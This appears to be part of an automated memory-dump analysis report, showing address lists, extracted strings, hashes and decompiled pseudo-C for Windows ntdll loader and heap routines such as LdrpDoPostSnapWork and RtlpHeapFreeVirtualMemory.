0x01009a23
0x0105167e
0x0105167f
0x01051681
0x01051683
0x01051684
0x00000000
0x01051684
0x00000000
0x01009aad
0x01009aad
0x01009ab0
0x01009ab3
0x01009ab3
0x01009ab6
0x00000000
0x00000000
0x01009ab8
0x01009aba
0x01009abc
0x01009ac8
0x01009ac8
0x00000000
0x01009abe
0x01009abe
0x01009ac0
0x00000000
0x01009ac0
0x01009abc
0x01009ad2
0x00000000
0x01009ad2
0x01009aab

Strings

HEAP[%wZ]: , xrefs: 01051550, 01051617, 010517BC, 01051905
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01051572, 01051639, 010517DE, 01051927
HEAP: , xrefs: 0105155D, 01051624, 010517C9, 01051912

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 507452b0656418f826063af069b2336976d036e2967760ac1459e3d737974bb2
Instruction ID: 3320a0d0f79d7d1743f8b9062149413d1dfac5c0e0d160ae06530ac033491cc7
Opcode Fuzzy Hash: 507452b0656418f826063af069b2336976d036e2967760ac1459e3d737974bb2
Instruction Fuzzy Hash: 7522EF706002469FEBA5DF2CC895B7BBBF5EF45704F1885A9E8C68B282D735D881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FF8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00FF934A() != 0) {
								_t159 = E0106A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x10d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01065510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x10d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00FF849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00FF8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00FF8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x10d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x10d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01002280(_t92, 0x10d86cc);
															_t94 = E010B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x10d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00FF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x10d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x10d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0102F380(_t136, 0xfc1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01002280(_t108, 0x10d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E010B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00FFFFB0(_t118, _t156, 0x10d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01029A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00ff8799
0x00ff879d
0x00ff87a1
0x00ff87a3
0x00ff87a8
0x00ff87c3
0x00ff87c3
0x00ff87c8
0x00ff87d1
0x00ff87d4
0x00ff87d8
0x00ff87e5
0x00ff87ec
0x01049bfe
0x01049c00
0x01049c02
0x01049c08
0x01049c0d
0x01049c0f
0x01049c14
0x01049c2d
0x01049c32
0x01049c37
0x01049c3a
0x01049c3c
0x01049c42
0x01049c42
0x01049c3c
0x01049c02
0x00ff87da
0x00ff87df
0x00ff87e3
0x00000000
0x00000000
0x00ff87e3
0x00ff87f2
0x00000000
0x00ff87fb
0x00ff87fd
0x00ff87fe
0x00ff880e
0x00ff880f
0x00ff8810
0x00ff8814
0x00ff881a
0x00ff881c
0x00ff881f
0x00ff8821
0x00ff8822
0x00ff8824
0x00ff8826
0x00ff882c
0x00ff882e
0x01049c48
0x01049c48
0x00ff8834
0x00ff8834
0x00ff8837
0x00000000
0x00000000
0x00ff8837
0x00ff882e
0x00ff883d
0x00ff8840
0x00ff8843
0x00ff8846
0x00ff8849
0x00ff884c
0x00ff884e
0x00ff8850
0x00ff8852
0x00ff8854
0x00ff8857
0x00ff88b4
0x00ff88b6
0x00ff88b6
0x00ff8859
0x00ff8859
0x00ff8859
0x00ff8861
0x00ff8866
0x00ff886a
0x00ff893d
0x00ff8941
0x00000000
0x00ff8947
0x00ff8947
0x00ff894a
0x00ff894c
0x00000000
0x00ff8952
0x00ff8955
0x00ff895a
0x00ff895d
0x00ff895d
0x00ff895f
0x00ff8961
0x00ff8961
0x00ff8968
0x00000000
0x00000000
0x00ff896a
0x00ff896b
0x00ff896e
0x00000000
0x00ff8970
0x00ff8970
0x00ff8970
0x00ff8970
0x00ff8972
0x00ff8972
0x00ff8974
0x00000000
0x00ff897a
0x00ff897a
0x00ff897d
0x00000000
0x00ff8983
0x01049c65
0x01049c6d
0x01049c72
0x01049c75
0x01049c75
0x01049c82
0x01049c86
0x01049c87
0x01049c88
0x01049c89
0x01049c8c
0x01049c90
0x01049c95
0x01049c97
0x01049ca0
0x01049ca3
0x01049ca9
0x01049ca9
0x00000000
0x01049ca9
0x01049ca3
0x00000000
0x01049c97
0x00ff897d
0x00000000
0x00ff8974
0x00ff8988
0x00ff8992
0x00ff8996
0x00000000
0x00ff8996
0x00ff894c
0x00000000
0x00ff8870
0x00ff887b
0x00ff887d
0x00ff887f
0x00ff8881
0x00ff8884
0x00ff8884
0x00ff8886
0x00ff8889
0x00ff888c
0x00ff888e
0x00ff8891
0x00ff8891
0x00ff8898
0x00000000
0x00000000
0x00ff889a
0x00ff889b
0x00ff889e
0x00000000
0x00000000
0x00ff88a0
0x00ff88a8
0x00ff88b0
0x00ff88b2
0x00ff88d3
0x00ff88d5
0x00000000
0x00ff88d7
0x00ff88db
0x00ff88dc
0x00ff88e0
0x00ff88e8
0x00ff88ee
0x00ff88f0
0x00ff88f3
0x00ff88fc
0x00ff8901
0x00ff8906
0x00ff890c
0x00ff890c
0x00ff890f
0x00ff8916
0x00ff8917
0x00ff8918
0x00ff8919
0x00ff891a
0x00ff891f
0x00ff8921
0x01049c52
0x01049c55
0x01049c5b
0x01049cac
0x01049cc0
0x01049cc0
0x01049c55
0x00ff8927
0x00ff8927
0x00ff892f
0x00ff8933
0x00000000
0x00ff88f5
0x00ff88f5
0x00000000
0x00ff88f7
0x00ff88f7
0x00ff88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00ff88fa
0x00ff88f5
0x00ff88f3
0x00000000
0x00ff88d5
0x00000000
0x00ff88b2
0x00ff88c9
0x00000000
0x00ff88c9
0x00ff887f
0x00ff886a
0x00ff8857
0x00ff8852
0x00ff88bf
0x00ff88bf
0x00ff87aa
0x00ff87ad
0x00ff87ae
0x00ff87b4
0x00ff87b5
0x00ff87b6
0x00ff87b8
0x00ff87bd
0x00ff87c1
0x00ff87f4
0x00ff87fa
0x00000000
0x00000000
0x00000000
0x00ff87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01049C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01049C18
LdrpDoPostSnapWork, xrefs: 01049C1E

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
Instruction ID: 3ceba34ab0b283dc1b4bce1900ab90c69d1003bc1a1573607350b4abb8bb20da
Opcode Fuzzy Hash: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
Instruction Fuzzy Hash: 10910672A0021EDFDF28DF59C8C1ABA77B5FF44394B544169EA41AB260DB70ED02DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC7B, Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0101AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0103D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x10d8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E010296E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01093C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E010296E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00FEB150();
							} else {
								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00FEB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E010A14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01007D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E010A1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01007D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E010A1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x0101ac85
0x0101ac88
0x0101ac8a
0x0101ac8d
0x0101ac91
0x0101ac99
0x0101ac9c
0x01059f57
0x01059f5b
0x01059f60
0x01059f60
0x0101aca8
0x0101acae
0x0101acda
0x0101acde
0x0101ace8
0x0101aceb
0x0101acee
0x00000000
0x0101acee
0x0101acf6
0x0101acb0
0x0101acb0
0x0101acbb
0x0101acbd
0x0101acc0
0x0101acc5
0x0101adae
0x0101adb4
0x0101adb4
0x0101acd4
0x0101acd8
0x0101acf9
0x0101acff
0x0101ad04
0x0101ad08
0x0101ad09
0x0101ad10
0x0101ad12
0x0101ad18
0x01059f6f
0x01059f74
0x01059f76
0x01059f7c
0x01059f84
0x01059f88
0x01059f89
0x01059f90
0x01059f90
0x01059f76
0x0101ad1e
0x0101ad24
0x0101ad26
0x0105a097
0x0105a09b
0x0105a0ba
0x0105a0bf
0x0105a09d
0x0105a0b2
0x0105a0b7
0x0105a0c5
0x0105a0c8
0x0105a0cb
0x0105a0d2
0x00000000
0x0101ad2c
0x0101ad2c
0x0101ad2f
0x0101ad34
0x0101ad36
0x01059f97
0x01059f9a
0x00000000
0x00000000
0x01059fa9
0x0101ad3e
0x0101ad3e
0x0101ad41
0x01059fb3
0x01059fb9
0x01059fc0
0x01059fd0
0x01059fd0
0x01059fc0
0x0101ad4a
0x0101ad50
0x0101ad5c
0x0101ad62
0x0101ad68
0x0101ad6b
0x0101ad6d
0x01059fda
0x01059fdd
0x00000000
0x00000000
0x01059fec
0x00000000
0x0101ad73
0x0101ad73
0x0101ad73
0x0101ad75
0x0101ad75
0x0101ad78
0x01059ff6
0x01059ffc
0x0105a003
0x0105a00e
0x0105a010
0x0105a01b
0x0105a01b
0x0105a01b
0x0105a038
0x0105a038
0x0105a003
0x0101ad84
0x0101ad89
0x0101ad8c
0x0101ad8e
0x0105a042
0x0105a045
0x00000000
0x00000000
0x0105a054
0x00000000
0x0101ad94
0x0101ad94
0x0101ad94
0x0101ad96
0x0101ad96
0x0101ad99
0x0105a063
0x0105a065
0x0105a070
0x0105a070
0x0105a070
0x0105a08d
0x0105a08d
0x0101ada4
0x0101ada6
0x00000000
0x0101ada6
0x0101ad8e
0x0101ad6d
0x0101ad3c
0x0101ad3c
0x00000000
0x0101ad3c
0x00000000
0x00000000
0x00000000
0x0101acd8

Strings

HEAP[%wZ]: , xrefs: 0105A0AD
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0105A0CD
HEAP: , xrefs: 0105A0BA

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 4ba39935adc4a340c1367f69cd086f2d0ceb748fbae89dfbf7a2ae29214c8bfc
Instruction ID: a07f8766687f05a840e893860988f7a72dd5e142ff5cb0a7b8bc4904c76f3aad
Opcode Fuzzy Hash: 4ba39935adc4a340c1367f69cd086f2d0ceb748fbae89dfbf7a2ae29214c8bfc
Instruction Fuzzy Hash: CB81E671305A84EFE726DBACC894BAABBF4FF04714F0441A5E9C187692D778E940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0100B73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0100B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E010AA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x10d8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00FEB150();
					__eflags =  *0x10d7bc8;
					if(__eflags == 0) {
						E010A2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E010AA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x10d8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x10d8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0100B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E010AA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0100E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x0100b746
0x0100b74b
0x0100b74d
0x0100b750
0x0100b755
0x0100b758
0x0100b758
0x0100b75e
0x0100b763
0x0100b764
0x0100b76a
0x0100b76d
0x0100b771
0x0100b776
0x0100b85c
0x0100b85d
0x0100b860
0x0100b865
0x01052ba1
0x01052ba2
0x01052ba9
0x01052bae
0x01052bae
0x0100b77c
0x0100b77c
0x0100b77c
0x0100b785
0x0100b788
0x01052bb6
0x01052bb9
0x00000000
0x00000000
0x01052bbf
0x01052bc5
0x01052bc9
0x01052be8
0x01052bed
0x01052bcb
0x01052be0
0x01052be5
0x01052bf3
0x01052bf8
0x01052bfd
0x01052c05
0x01052c0e
0x01052c0e
0x00000000
0x0100b78e
0x0100b78e
0x0100b78e
0x0100b791
0x0100b791
0x0100b797
0x0100b797
0x0100b79f
0x0100b7a9
0x0100b7af
0x0100b7af
0x0100b7b1
0x0100b7b6
0x0100b7e2
0x0100b7e2
0x0100b7e7
0x0100b880
0x0100b7ed
0x0100b7ed
